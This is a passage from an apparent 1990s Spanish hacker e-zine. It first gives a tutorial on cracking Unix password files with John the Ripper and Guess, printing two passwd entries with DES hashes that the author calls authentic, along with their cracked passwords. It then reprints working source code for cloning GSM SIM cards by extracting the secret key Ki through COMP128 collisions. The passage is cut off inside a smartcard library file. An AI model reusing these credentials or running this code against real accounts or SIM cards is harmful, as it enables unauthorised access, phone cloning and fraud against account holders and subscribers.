- Como haveis podido notar estoy usando la version MS-DOS,
- sencillamente es el s.o. en el cual encontraremos mas crackeadores y ademas
- es la forma que mas gente utiliza, por eso prefiero usar el MS-DOS para este
- caso pero es igualito que en Unix/Linux.
-
- ahora le damos al John un fichero passwd, pero con la opcion single,
- y el resultado sera el siguiente:
-
- D:\hacker\john>john -single echpass
-
- John the Ripper Version 1.5 Copyright (c) 1996-98 by Solar Designer
-
- Loaded 3 passwords with 3 different salts (Standard DES [24/32 4K])
- wnnwnn (wnn)
- oracle6 (oracle)
- guesses: 2 time: 0:00:00:00 100% c/s: 2840 trying: root1958 - r1969
-
- D:\hacker\john>
-
- Podemos apreciar que el John a encontrado 2 cuentas, decir que el
- passwd que estoy usando es autentico :) pero posee muy pocas cuenta por lo
- que creo que es passwd perfecto para este proposito. La cuenta son las
- siguientes:
-
- oracle:vM5OPrBhNOeGY:2000:2000::/opt/oracle:/bin/csh
- wnn:WtTIftFaGSXTM:2005:2005::/tmp:/bin/csh
-
- Esto para el que quiera comprobar la autenticidad de los mismos :)
- Ahora lo que nos interesa es usar un diccionario con el John ya que asi
- podra comparar el diccionario con el passwd y obtener las contraseñas de
- las cuenta que coincidan. Y para ello ejecutamos la sigueinte linea:
-
- D:\hacker\john>john -wordfile:password.lst echpass
-
- John the Ripper Version 1.5 Copyright (c) 1996-98 by Solar Designer
-
- Loaded 1 password (Standard DES [24/32 4K])
- guesses: 0 time: 0:00:00:00 100% c/s: 2268 trying: sailor - zhongguo
-
- D:\hacker\john>
-
- Y como vemos el John en este caso no a encontrado nada, es logico
- ya que ninguna palabra que se usaban en las contraseñas sale en el
- diccionario usado, el cual es el propio diccionario que trae el John. Lo
- aqui presentado es la forma mas basica, por lo que es recomendable que el
- lector realize sus propios experimentos y obtenga sus conclusiones.
-
- Ahora veremos otro famoso crackeador, el cual es conocido como
- Guess, y lo ejecutamos nos sale lo siguiente:
-
- D:\crack>guess
-
- GUESS: Unix Password Checker [Version 2.1]
- GUESS - Copyright 1991 Christian Beaumont
- C_BEAUMONT@UK.AC.LUT.HICOM and Sysop of fidonet node 2:250/301
- THIS IS A BETA TEST VERSION FOR PUBLIC DISTRIBUTION
- Use: GUESS [PASSWORD_FILE] [[OPTION] [DICTIONARY]] ...
- Options are:
-
- -a Perform algorithmic check of password file
- -cWORD Catch up to specified word in dictionary
- -sWORD Check password file against specifed word only
- -uNAME Limit checking of dictionary to a certain user name
- -w Permit checking of dictionary to all users
-
- If you find GUESS useful or have any comments please feel free
- to contact me.
-
- Christian Beaumont +44-81-883-5683 (home) +44-81-680-1066 (work)
-
- D:\crack>
-
- Como vemos nos sale las diferentes opciones que lleva el programa,
- ahora ejecutaremos el Guess con el fichero de contraseñas de la siguiente
- manera:
-
- D:\crack>guess echpass -a
- Reading password file ...
- ENTRIES 19
- BROKEN 0
- UNBROKEN 3
- PERCENT BROKEN 0
- Initialising tables
- Performing algorithmic check
- wnn is wnnwnn
- 6 guesses in 0 seconds (109 guesses/sec 1 clocks)
-
- D:\crack>
-
- Como podemos apreciar solo a encontrado una cuenta, la cual es "wnn",
- aqui vemos una diferencia entre el Guess y el John. Como siempre lo mejor
- es usar un diccionario, pero si fuese el caso que consegueis un fichero
- passwd de un pais extranjero, lo logico es que useis un diccionario en
- ese idioma, ya que asi conseguireis averiguar mas cuentas. Un buen sitio
- para pillar diccionarios es el siguiente url:
-
- http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html
-
- Para que luego digan que no aprovechamos los recursos de la NCSA :)
- Y ahora un pongo una lista con los diferentes crackeadores que os podreis
- encontrar en Internet o en nuestra seccion de CRACK.
-
- Nombre Plataforma
- ------ ----------
-
- # Crack Unix\Dos
-
- # CrackerJack Unix\Dos\Os/2
-
- # PaceCrack95 Windows
-
- # Qcrack Dos\Windows
-
- # John the Ripper Unix\Dos\Windows
-
- # Pcrack Unix
-
- # Hades Dos
-
- # Star Cracker Dos
-
- # Killer Cracker Unix
-
- # Hellfire Cracker Dos
-
- # Xit Dos
-
- # Claymore Windows
-
- # Guess Dos
-
- # PC Unix Password Cracker Dos
-
- # Merlin Unix
-
- Por si no queda lo suficientemente claro todos estos crackeadores
- solo sirven para los ficheros /etc/passwd de Unix, la plataforma, es en el
- sistema operativo la cual corren estos programas.
-
- Para conseguir una gran variedad de crackeadores lo mejor es pasar
- por nuestra seccion de CRACK, en la cual podras bajarte muchos, incluido
- el John. En caso que algo no haya quedado claro, pues en envias un mail
- y lo solucionare en el proximo numero :)
-
- Byes all y hasta la vista !!
-
- CONDE VAMPIRO
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- \-------------------------------/
- \ CLONANDO MOVILES DEL CCC /
- \-----------------------/
-
- NOTA DE - J.J.F. / HACKERS TEAM - : Todo este codigo fuente fue
- obtenido en el website del CCC (Chaos Computer Club). Un conocido grupo de
- hackers alemanes. Por lo que no nos hacemos responsables del mal uso del
- material aqui expuesto. Este codigo es para sistemas operativos Linux.
-
- http://www.ccc.de
-
- File : getresponse.cc
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- #include "getresponse.h"
- #include <stdio.h>
- #include <string.h>
- #include <stdlib.h>
- #include <ctype.h>
-
- #define private private_hack
- extern "C" {
- #include <sio.h>
- #include <sct0.h>
- #include <sc.h>
- }
- #undef private
-
- int timeout;
-
- SIO_INFO* si;
- Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 };
- Byte gsm_file[] = { 0x7f, 0x20 };
- Byte gsm2_file[] = { 0x7f, 0x21 };
- Byte get_res[] = { 0xa0, 0xc0, 0x00, 0x00, 0x00 };
- Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, 0x08 };
- Byte generate_sres[] = { 0xa0, 0x88, 0x00, 0x00, 0x10 };
-
- void init_card(char* devicename, Byte pin[8]) {
- Byte buffer[32];
- int i;
- SC_ATR * atr;
- SC_STATE *sc;
- SLOG *log;
-
- si = SIO_Open(devicename);
- if (si!=NULL) {
- /* setup for 9600, 8 data, 2 stop, even parity */
- SIO_SetSpeed(si,9600);
- SIO_SetDataBits(si,8);
- SIO_SetStopBits(si,2);
- SIO_SetParity(si,SIO_PARITY_ODD);
- SIO_SetIOMode(si,SIO_IOMODE_INDIRECT);
- SIO_FilterEcho(si, 1);
-
- /* now actually change the line settings */
- SIO_WriteSettings(si);
-
- /* trigger ATR from a Smartcard */
- if(i = SCT0_GetATR(si, buffer, 32)) {
- atr=SC_DecodeATR(buffer, i);
- printf("ATR: %s\n", SC_ATR2Text(atr, 0));
-
- SIO_Delay(si,10000);
- SIO_WriteBuffer(si, selectfile, 5);
- SIO_WaitForData(si, 1000);
- SIO_ReadBuffer(si, buffer, 32);
-
- SIO_WriteBuffer(si, gsm_file, 2);
- SIO_WaitForData(si, 1000);
- SIO_ReadBuffer(si, buffer, 32);
-
- if(buffer[0] != 0x9f) {
- printf("selecting gsm_file failed, trying DCS1800!\n");
-
- SIO_WriteBuffer(si, selectfile, 5);
- SIO_WaitForData(si, 1000);
- SIO_ReadBuffer(si, buffer, 32);
-
- SIO_WriteBuffer(si, gsm2_file, 2);
- SIO_WaitForData(si, 1000);
- SIO_ReadBuffer(si, buffer, 32);
-
- if(buffer[0] != 0x9f) {
- printf("selecting gsm_file failed!\n");
- exit(1);
- }
- }
- get_res[4] = buffer[1];
- memcpy(buffer, get_res, 5);
- SIO_WriteBuffer(si, buffer, 5);
- SIO_WaitForData(si, 1000);
- i = SIO_ReadBuffer(si, buffer, 32);
-
- SIO_WriteBuffer(si, verify_pin, 5);
- SIO_WaitForData(si, 1000);
- i = SIO_ReadBuffer(si, buffer, 32);
-
- SIO_WriteBuffer(si, pin, 8);
- SIO_Delay(si,100000);
- SIO_WaitForData(si, 1000);
- i = SIO_ReadBuffer(si, buffer, 32);
-
- if(buffer[0] != 0x90) {
- printf("PIN verification failed!\n");
- for(int j=0; j<i; j++) {
- printf("0x%02X ", buffer[j]);
- }
- printf("\n");
- exit(1);
- }
-
- } else {
- printf("Sorry, connection to your smart card failed.\n");
- exit(1);
- }
- } else {
- printf("Sorry, opening the device %s failed.\n", devicename);
- exit(1);
- }
- }
-
- void get_response(Byte challenge[16], Byte response[12]) {
- Byte buffer[32];
- int i;
-
- memcpy(buffer, generate_sres, 5);
- SIO_WriteBuffer(si, buffer, 5);
- do {
- SIO_WaitForData(si, 1000);
- i = SIO_ReadBuffer(si, buffer, 32);
- } while (i==0);
-
-
- memcpy(buffer, challenge, 16);
- SIO_WriteBuffer(si, buffer, 16);
- SIO_Delay(si, timeout);
- do {
- SIO_WaitForData(si, 1000);
- i = SIO_ReadBuffer(si, buffer, 32);
- } while (i==0);
-
- if(buffer[0] != 0x9f) {
- printf("getting response failed!\n");
- exit(1);
- }
-
- get_res[4] = buffer[1];
- memcpy(buffer, get_res, 5);
- SIO_WriteBuffer(si, buffer, 5);
- SIO_WaitForData(si, 1000);
- i = SIO_ReadBuffer(si, buffer, 32);
-
- memcpy(response, buffer + 1, 12);
- }
-
- void set_timeout(int t) {
- timeout = t;
- }
-
- #ifdef 0
- int main(int argc, char** argv) {
- Byte challenge[16] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
- Byte pin[8] = { 0x35, 0x35, 0x35, 0x35, 0xff, 0xff, 0xff, 0xff };
-
- Byte response[12];
-
- init_card("/dev/ttyS1", pin);
- get_response(challenge, response);
- }
- #endif
-
- ------------ FIN -------------------------------------------------------------
-
- File : getresponse.h
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- #ifndef _GETRESPONSE_H
- #define _GETRESPONSE_H
-
- typedef unsigned char Byte;
-
- extern void init_card(char* devicename, Byte pin[8]);
- extern void get_response(Byte challenge[16], Byte response[12]);
- extern void set_timeout(int);
-
- #endif
-
- ------------ FIN -------------------------------------------------------------
-
- File : README.GSM
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- Hi!
-
- You should have extracted this archive into the same directory as
- sio. You can get the latest version of sio at ftp://ftp.cryptsoft/com/scard,
- and the latest version of this hack at ftp://www.ccc.de/pub/gsm.
-
- This archive contains a patched sct0.c, which makes this work with
- the CCC UniProg and SerProg chipcard interfaces.
-
- Information about this hack is available at http://www.scard.org. This
- implementation is by andreas@ccc.de.
-
- Type 'make scan_collision' to build the executable. Type
-
- './scan_collision <PIN> <timeout>'
-
- to start scanning. The PIN is the PIN of the card. timeout is the time
- the card should wait for the response, the GSM standard specifies that to
- be 50ms, give 50000 here.
-
- You have to change the serial device and communication parameters in
- the source. Sorry.
-
- Andreas
-
- ------------ FIN -------------------------------------------------------------
-
- File : scan_collision.cc
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- #include <map.h>
- #include <stdio.h>
- #include <ctype.h>
- #include "getresponse.h"
-
- #undef TEST
-
- typedef unsigned char Byte;
-
-
- struct ltsim {
- bool operator()(const Byte* b1, const Byte* b2) const {
- return memcmp(b1, b2, 12) < 0;
- }
- };
-
- typedef map<const Byte*, const Byte*, ltsim> simoutput_map;
-
- /* An implementation of the GSM A3A8 algorithm. (Specifically, COMP128.)
- */
-
- /* Copyright 1998, Marc Briceno, Ian Goldberg, and David Wagner.
- * All rights reserved.
- */
-
- /*
- * For expository purposes only. Coded in C merely because C is a much
- * more precise, concise form of expression for these purposes. See Judge
- * Patel if you have any problems with this...
- * Of course, it's only authentication, so it should be exportable for the
- * usual boring reasons.
- */
-
- /* The compression tables. */
- static const Byte table_0[512] = {
- 102,177,186,162, 2,156,112, 75, 55, 25, 8, 12,251,193,246,188,
- 109,213,151, 53, 42, 79,191,115,233,242,164,223,209,148,108,161,
- 252, 37,244, 47, 64,211, 6,237,185,160,139,113, 76,138, 59, 70,
- 67, 26, 13,157, 63,179,221, 30,214, 36,166, 69,152,124,207,116,
- 247,194, 41, 84, 71, 1, 49, 14, 95, 35,169, 21, 96, 78,215,225,
- 182,243, 28, 92,201,118, 4, 74,248,128, 17, 11,146,132,245, 48,
- 149, 90,120, 39, 87,230,106,232,175, 19,126,190,202,141,137,176,
- 250, 27,101, 40,219,227, 58, 20, 51,178, 98,216,140, 22, 32,121,
- 61,103,203, 72, 29,110, 85,212,180,204,150,183, 15, 66,172,196,
- 56,197,158, 0,100, 45,153, 7,144,222,163,167, 60,135,210,231,
- 174,165, 38,249,224, 34,220,229,217,208,241, 68,206,189,125,255,
- 239, 54,168, 89,123,122, 73,145,117,234,143, 99,129,200,192, 82,
- 104,170,136,235, 93, 81,205,173,236, 94,105, 52, 46,228,198, 5,
- 57,254, 97,155,142,133,199,171,187, 50, 65,181,127,107,147,226,
- 184,218,131, 33, 77, 86, 31, 44, 88, 62,238, 18, 24, 43,154, 23,
- 80,159,134,111, 9,114, 3, 91, 16,130, 83, 10,195,240,253,119,
- 177,102,162,186,156, 2, 75,112, 25, 55, 12, 8,193,251,188,246,
- 213,109, 53,151, 79, 42,115,191,242,233,223,164,148,209,161,108,
- 37,252, 47,244,211, 64,237, 6,160,185,113,139,138, 76, 70, 59,
- 26, 67,157, 13,179, 63, 30,221, 36,214, 69,166,124,152,116,207,
- 194,247, 84, 41, 1, 71, 14, 49, 35, 95, 21,169, 78, 96,225,215,
- 243,182, 92, 28,118,201, 74, 4,128,248, 11, 17,132,146, 48,245,
- 90,149, 39,120,230, 87,232,106, 19,175,190,126,141,202,176,137,
- 27,250, 40,101,227,219, 20, 58,178, 51,216, 98, 22,140,121, 32,
- 103, 61, 72,203,110, 29,212, 85,204,180,183,150, 66, 15,196,172,
- 197, 56, 0,158, 45,100, 7,153,222,144,167,163,135, 60,231,210,
- 165,174,249, 38, 34,224,229,220,208,217, 68,241,189,206,255,125,
- 54,239, 89,168,122,123,145, 73,234,117, 99,143,200,129, 82,192,
- 170,104,235,136, 81, 93,173,205, 94,236, 52,105,228, 46, 5,198,
- 254, 57,155, 97,133,142,171,199, 50,187,181, 65,107,127,226,147,
- 218,184, 33,131, 86, 77, 44, 31, 62, 88, 18,238, 43, 24, 23,154,
- 159, 80,111,134,114, 9, 91, 3,130, 16, 10, 83,240,195,119,253
- }, table_1[256] = {
- 19, 11, 80,114, 43, 1, 69, 94, 39, 18,127,117, 97, 3, 85, 43,
- 27,124, 70, 83, 47, 71, 63, 10, 47, 89, 79, 4, 14, 59, 11, 5,
- 35,107,103, 68, 21, 86, 36, 91, 85,126, 32, 50,109, 94,120, 6,
- 53, 79, 28, 45, 99, 95, 41, 34, 88, 68, 93, 55,110,125,105, 20,
- 90, 80, 76, 96, 23, 60, 89, 64,121, 56, 14, 74,101, 8, 19, 78,
- 76, 66,104, 46,111, 50, 32, 3, 39, 0, 58, 25, 92, 22, 18, 51,
- 57, 65,119,116, 22,109, 7, 86, 59, 93, 62,110, 78, 99, 77, 67,
- 12,113, 87, 98,102, 5, 88, 33, 38, 56, 23, 8, 75, 45, 13, 75,
- 95, 63, 28, 49,123,120, 20,112, 44, 30, 15, 98,106, 2,103, 29,
- 82,107, 42,124, 24, 30, 41, 16,108,100,117, 40, 73, 40, 7,114,
- 82,115, 36,112, 12,102,100, 84, 92, 48, 72, 97, 9, 54, 55, 74,
- 113,123, 17, 26, 53, 58, 4, 9, 69,122, 21,118, 42, 60, 27, 73,
- 118,125, 34, 15, 65,115, 84, 64, 62, 81, 70, 1, 24,111,121, 83,
- 104, 81, 49,127, 48,105, 31, 10, 6, 91, 87, 37, 16, 54,116,126,
- 31, 38, 13, 0, 72,106, 77, 61, 26, 67, 46, 29, 96, 37, 61, 52,
- 101, 17, 44,108, 71, 52, 66, 57, 33, 51, 25, 90, 2,119,122, 35
- }, table_2[128] = {
- 52, 50, 44, 6, 21, 49, 41, 59, 39, 51, 25, 32, 51, 47, 52, 43,
- 37, 4, 40, 34, 61, 12, 28, 4, 58, 23, 8, 15, 12, 22, 9, 18,
- 55, 10, 33, 35, 50, 1, 43, 3, 57, 13, 62, 14, 7, 42, 44, 59,
- 62, 57, 27, 6, 8, 31, 26, 54, 41, 22, 45, 20, 39, 3, 16, 56,
- 48, 2, 21, 28, 36, 42, 60, 33, 34, 18, 0, 11, 24, 10, 17, 61,
- 29, 14, 45, 26, 55, 46, 11, 17, 54, 46, 9, 24, 30, 60, 32, 0,
- 20, 38, 2, 30, 58, 35, 1, 16, 56, 40, 23, 48, 13, 19, 19, 27,
- 31, 53, 47, 38, 63, 15, 49, 5, 37, 53, 25, 36, 63, 29, 5, 7
- }, table_3[64] = {
- 1, 5, 29, 6, 25, 1, 18, 23, 17, 19, 0, 9, 24, 25, 6, 31,
- 28, 20, 24, 30, 4, 27, 3, 13, 15, 16, 14, 18, 4, 3, 8, 9,
- 20, 0, 12, 26, 21, 8, 28, 2, 29, 2, 15, 7, 11, 22, 14, 10,
- 17, 21, 12, 30, 26, 27, 16, 31, 11, 7, 13, 23, 10, 5, 22, 19
- }, table_4[32] = {
- 15, 12, 10, 4, 1, 14, 11, 7, 5, 0, 14, 7, 1, 2, 13, 8,
- 10, 3, 4, 9, 6, 0, 3, 2, 5, 6, 8, 9, 11, 13, 15, 12
- }, *table[5] = { table_0, table_1, table_2, table_3, table_4 };
-
- /*
- * rand[0..15]: the challenge from the base station
- * key[0..15]: the SIM's A3/A8 long-term key Ki
- * simoutput[0..11]: what you'd get back if you fed rand and key to a real
- * SIM.
- *
- * The GSM spec states that simoutput[0..3] is SRES,
- * and simoutput[4..11] is Kc (the A5 session key).
- * (See GSM 11.11, Section 8.16. See also the leaked document
- * referenced below.)
- * Note that Kc is bits 74..127 of the COMP128 output, followed by 10
- * zeros.
- * In other words, A5 is keyed with only 54 bits of entropy. This
- * represents a deliberate weakening of the key used for voice privacy
- * by a factor of over 1000.
- *
- * Verified with a Pacific Bell Schlumberger SIM. Your mileage may vary.
- *
- * Marc Briceno <marc@scard.org>, Ian Goldberg <iang@cs.berkeley.edu>,
- * and David Wagner <daw@cs.berkeley.edu>
- *//*
- * This code derived from a leaked document from the GSM standards.
- * Some missing pieces were filled in by reverse-engineering a working SIM.
- * We have verified that this is the correct COMP128 algorithm.
- *
- * The first page of the document identifies it as
- * _Technical Information: GSM System Security Study_.
- * 10-1617-01, 10th June 1988.
- * The bottom of the title page is marked
- * Racal Research Ltd.
- * Worton Drive, Worton Grange Industrial Estate,
- * Reading, Berks. RG2 0SB, England.
- * Telephone: Reading (0734) 868601 Telex: 847152
- * The relevant bits are in Part I, Section 20 (pages 66--67). Enjoy!
- *
- * Note: There are three typos in the spec (discovered by
- * reverse-engineering).
- * First, "z = (2 * x[n] + x[n]) mod 2^(9-j)" should clearly read
- * "z = (2 * x[m] + x[n]) mod 2^(9-j)".
- * Second, the "k" loop in the "Form bits from bytes" section is severely
- * botched: the k index should run only from 0 to 3, and clearly the range
- * on "the (8-k)th bit of byte j" is also off (should be 0..7, not 1..8,
- * to be consistent with the subsequent section).
- * Third, SRES is taken from the first 8 nibbles of x[], not the last 8 as
- * claimed in the document. (And the document doesn't specify how Kc is
- * derived, but that was also easily discovered with reverse engineering.)
- * All of these typos have been corrected in the following code.
- */
-
- void A3A8(/* in */ Byte rand[16], /* in */ Byte key[16],
- /* out */ Byte simoutput[12])
- {
- Byte x[32], bit[128];
- int i, j, k, l, m, n, y, z, next_bit;
-
- /* ( Load RAND into last 16 bytes of input ) */
- for (i=16; i<32; i++)
- x[i] = rand[i-16];
-
- /* ( Loop eight times ) */
- for (i=1; i<9; i++) {
- /* ( Load key into first 16 bytes of input ) */
- for (j=0; j<16; j++)
- x[j] = key[j];
- /* ( Perform substitutions ) */
- for (j=0; j<5; j++)
- for (k=0; k<(1<<j); k++)
- for (l=0; l<(1<<(4-j)); l++) {
- m = l + k*(1<<(5-j));
- n = m + (1<<(4-j));
- y = (x[m]+2*x[n]) % (1<<(9-j));
- z = (2*x[m]+x[n]) % (1<<(9-j));
- x[m] = table[j][y];
- x[n] = table[j][z];
- }
- /* ( Form bits from bytes ) */
- for (j=0; j<32; j++)
- for (k=0; k<4; k++)
- bit[4*j+k] = (x[j]>>(3-k)) & 1;
- /* ( Permutation but not on the last loop ) */
- if (i < 8)
- for (j=0; j<16; j++) {
- x[j+16] = 0;
- for (k=0; k<8; k++) {
- next_bit = ((8*j + k)*17) % 128;
- x[j+16] |= bit[next_bit] << (7-k);
- }
- }
- }
-
- /*
- * ( At this stage the vector x[] consists of 32 nibbles.
- * The first 8 of these are taken as the output SRES. )
- */
-
- /* The remainder of the code is not given explicitly in the
- * standard, but was derived by reverse-engineering.
- */
-
- for (i=0; i<4; i++)
- simoutput[i] = (x[2*i]<<4) | x[2*i+1];
- for (i=0; i<6; i++)
- simoutput[4+i] = (x[2*i+18]<<6) | (x[2*i+18+1]<<2)
- | (x[2*i+18+2]>>2);
- simoutput[4+6] = (x[2*6+18]<<6) | (x[2*6+18+1]<<2);
- simoutput[4+7] = 0;
- }
-
- int hextoint(char x)
- {
- x = toupper(x);
- if (x >= 'A' && x <= 'F')
- return x-'A'+10;
- else if (x >= '0' && x <= '9')
- return x-'0';
- fprintf(stderr, "bad input.\n");
- exit(1);
- return 0;
- }
-
- int main(int argc, char **argv)
- {
- Byte pin[8] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
- Byte key[16], simoutput[12];
- int i,j,k,l;
- simoutput_map* simmap;
- Byte* collision_map[8][2];
-
- #ifdef TEST
- if (argc != 2 || strlen(argv[1]) != 34
- || strncmp(argv[1], "0x", 2) != 0) {
- fprintf(stderr, "Usage: %s 0x<key>\n", argv[0]);
- exit(1);
- }
-
- for (i=0; i<16; i++)
- key[i] = (hextoint(argv[1][2*i+2])<<4)
- | hextoint(argv[1][2*i+3]);
- #else
- if (argc != 3) {
- fprintf(stderr, "Usage: %s <PIN> <timeout>\n", argv[0]);
- exit(1);
- }
-
- for (i=0; i<strlen(argv[1]) && i<8; i++) {
- pin[i] = argv[1][i];
- }
-
- set_timeout(atoi(argv[2]));
-
- #endif
-
- init_card("/dev/ttyS1", pin);
-
- for(i=0; i < 8; i++) {
- simmap = new simoutput_map;
- collision_map[i][0] = NULL;
- collision_map[i][1] = NULL;
- for(j=0; j<256; j++) {
- fprintf(stderr, ".");
- for(k=0; k<256; k++) {
- Byte* newrand = new Byte[16];
- memset(newrand, 0, 16);
- newrand[i+8] = k;
- newrand[i] = j;
-
- Byte* newoutput = new Byte[12];
-
- #ifdef TEST
- A3A8(newrand, key, newoutput);
- #else
- get_response(newrand, newoutput);
- #endif
- if(simmap->count(newoutput)) {
- printf("\nCollision for i=%i: ", i);
- for (l=0; l<16; l++)
- printf("%02X", newrand[l]);
- printf(" ");
- for (l=0; l<16; l++)
- printf("%02X", (*simmap)[newoutput][l]);
- j=256; k=256;
- collision_map[i][0] = new Byte[16];
- collision_map[i][1] = new Byte[16];
- memcpy(collision_map[i][0], newrand, 16);
- memcpy(collision_map[i][1], (*simmap)[newoutput], 16);
-
- } else {
- #ifdef VERBOSE
- for (l=0; l<16; l++)
- printf("%02X", newrand[l]);
- printf(" ");
- for (l=0; l<12; l++)
- printf("%02X", newoutput[l]);
- printf("\n");
- #endif
- (*simmap)[newoutput]=newrand;
- }
- fflush(stdout);
- }
- }
- printf("\n");
- for(simoutput_map::iterator I=simmap->begin(); I!=simmap->end(); I++) {
- delete (*I).first;
- delete (*I).second;
- // simmap.erase(I);
- }
- delete simmap;
- }
-
- Byte newkey[16];
- Byte resultkey[16];
- Byte res1[16], res2[16];
-
- memset(resultkey, 0, 16);
-
- for(i=0; i<8; i++) {
- memset(newkey, 0, 16);
- for(j=0; j<256; j++) {
- newkey[i]=j;
- fprintf(stderr, ".");
- for(k=0; k<256; k++) {
- newkey[i+8]=k;
- A3A8(collision_map[i][0], newkey, res1);
- A3A8(collision_map[i][1], newkey, res2);
- if(!memcmp(res1, res2, 12)) {
- resultkey[i]=j;
- resultkey[i+8]=k;
- printf("\nKey bytes found, Ki so far: ");
- for (l=0; l<16; l++)
- printf("%02X", resultkey[l]);
- j = 256; k = 256;
- }
- }
- }
- printf("\n");
- }
- printf("\nAnd the Ki is: ");
- for (l=0; l<16; l++)
- printf("%02X", resultkey[l]);
- printf("\n");
-
- return 0;
- }
-
- ------------ FIN -------------------------------------------------------------
-
- File : SCT0.C
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /* sct0.c - Smartcard T=0 related functions
- *
- * Copyright 1993-1997, Tim Hudson. All rights reserved.
- *
- * You can pretty much do what you like with this code except pretend that
- * you wrote it provided that any derivative of this code includes the
- * above comments unchanged. If you put this in a product then attribution
- * is mandatory. See the details in the COPYING file.
- *
- * Tim Hudson
- * tjh@cryptsoft.com
- *
- */
-
- #include <stdio.h>
- #include <ctype.h>
- #include <stdlib.h>
- #include <string.h>
-
- #include "sio.h"
- #include "sct0.h"
-
- static int dbglev=0;
- static SLOG *outf=NULL;
-
- /* max number of times we retry a probe when we don't get back
- * something that is a valid response
- */
- #define MAX_RETRIES 2
-
- int SCT0_SetDebug(int lev)
- {
- int oldlev;
-
- oldlev=dbglev;
- dbglev=lev;
- return(oldlev);
- }
-
- int SCT0_GetDebug(void)
- {
- return(dbglev);
- }
-
- int SCT0_SetDebugLog(SLOG *slog)
- {
- if (outf!=NULL)
- SLOG_close(outf);
- outf=slog;
- return(1);
- }
-
- int SCT0_Reset(SIO_INFO *s)
- {
- int ch;
-
- /* flush any data in the buffer - this is important */
- while ((ch=SIO_ReadChar(s))!=-1)
- ;
-
- /* toggle RTS to trigger reset */
- #if 0
- SIO_DropRTS(s);
- SIO_Delay(s,25);
- SIO_RaiseRTS(s);
- SIO_Delay(s,25);
- #endif
- #if 1
- SIO_RaiseRTS(s);
- SIO_Delay(s,25);
- SIO_DropRTS(s);
- SIO_Delay(s,25);
- #endif
-
- return(1);
- }
-
- int SCT0_GetATR(SIO_INFO *s,char *buf,int bufsize)
- {
- int i,n,ch;
-
- SCT0_Reset(s);
-
- /* now read in whatever data is available */
- n=0;
- /* we have two shots at doing this ... some cards are a little
- * slow at responding
- */
- for(i=0;i<2;i++) {
- while ((ch=SIO_ReadChar(s))!=-1) {
- if (buf!=NULL) {
- if (n>=bufsize)
- break;
- buf[n++]=(ch & 0xff);
- }
- }
- }
- return(n);
- }
-
- /* we maintain a table of settings that it makes sense to scan through
- * when looking for the communication settings for use with a particular
- * smartcard ... the order here is setup to match the most likely things
- * first so you probably shouldn't play with it.
- */
- static long all_speed[]={9600L,19200L,38400L,115200L};
- static int all_parity[]={SIO_PARITY_EVEN,SIO_PARITY_ODD,SIO_PARITY_NONE};
- static int all_databits[]={8,7};
- static int all_stopbits[]={2,1};
- static int all_iomode[]={SIO_IOMODE_DIRECT,SIO_IOMODE_INDIRECT};
-
- #define N_all_speed (sizeof(all_speed)/sizeof(all_speed[0]))
- #define N_all_parity (sizeof(all_parity)/sizeof(all_parity[0]))
- #define N_all_databits (sizeof(all_databits)/sizeof(all_databits[0]))
- #define N_all_stopbits (sizeof(all_stopbits)/sizeof(all_stopbits[0]))
- #define N_all_iomode (sizeof(all_iomode)/sizeof(all_iomode[0]))
-
- int SCT0_ScanForATR(SIO_INFO *s,char *ubuf,int ubufsiz)
- {
- long aspeed;
- int aparity,adatabits,astopbits,aiomode;
- char buf[256];
- int len;
-
- for(aspeed=0;aspeed<N_all_speed;aspeed++)
- for(adatabits=0;adatabits<N_all_databits;adatabits++)
- for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
- for(aparity=0;aparity<N_all_parity;aparity++)
- for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
- SIO_SetSpeed(s,all_speed[aspeed]);
- SIO_SetDataBits(s,all_databits[adatabits]);
- SIO_SetStopBits(s,all_stopbits[astopbits]);
- SIO_SetParity(s,all_parity[aparity]);
- SIO_SetIOMode(s,all_iomode[aiomode]);
- SIO_WriteSettings(s);
- len=SCT0_GetATR(s,buf,sizeof(buf));
-
- if (dbglev)
- SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
- if (len>0) {
- if (dbglev) {
- /* dump the record */
- SLOG_printf(outf,"ATR-DATA: ");
- SLOG_dump(outf,buf,len,0);
- SLOG_printf(outf,"\n");
- SLOG_printf(outf,"ATR-TEXT: ");
- SLOG_dump(outf,buf,len,1);
- SLOG_printf(outf,"\n");
- }
- /* it has to be a valid ATR response before we
- * consider that it has worked
- */
- if ((buf[0]==0x3f)||(buf[0]==0x3b)) {
- /* copy into the users buffer */
- if ((ubuf!=NULL)&&(len<=ubufsiz))
- memcpy(ubuf,buf,len);
- return(len);
- }
- }
- }
- return(0);
- }
-
- int SCT0_ScanClasses(SIO_INFO *s,char *classlist)
- {
- int i,j,len;
- unsigned char buf[BUFSIZ];
- int retries,reset_done;
-
- /* flush data ... read until nothing available */
- while (SIO_ReadChar(s)!=-1)
- ;
-
- reset_done=retries=0;
- for(i=0;i<=255;i++) {
- do_again: ;
- buf[0]=i; /* CLA = 0 */
- buf[1]=0x0;
- buf[2]=0x0;
- buf[3]=0x0;
- buf[4]=0x0;
- len=SIO_WriteBuffer(s,buf,5);
-
- /* we need to delay before reading to give the reader time
- * to start responding
- */
- SIO_Delay(s,100);
-
- /* now read in some data */
- for(j=0;j<2;j++) {
- len=SIO_ReadBuffer(s,buf,sizeof(buf));
- if (len>0)
- break;
- }
-
- if (dbglev) {
- SLOG_printf(outf,"CLA 0x%02x: (%d) ",i,len);
- SLOG_dump(outf,buf,len,0);
- SLOG_printf(outf,"\n");
- }
-
- if (len!=2) {
- if (retries++>MAX_RETRIES) {
- if (!reset_done) {
- /* reset things ... some cards defend against
- * a probe like this
- */
- SCT0_Reset(s);
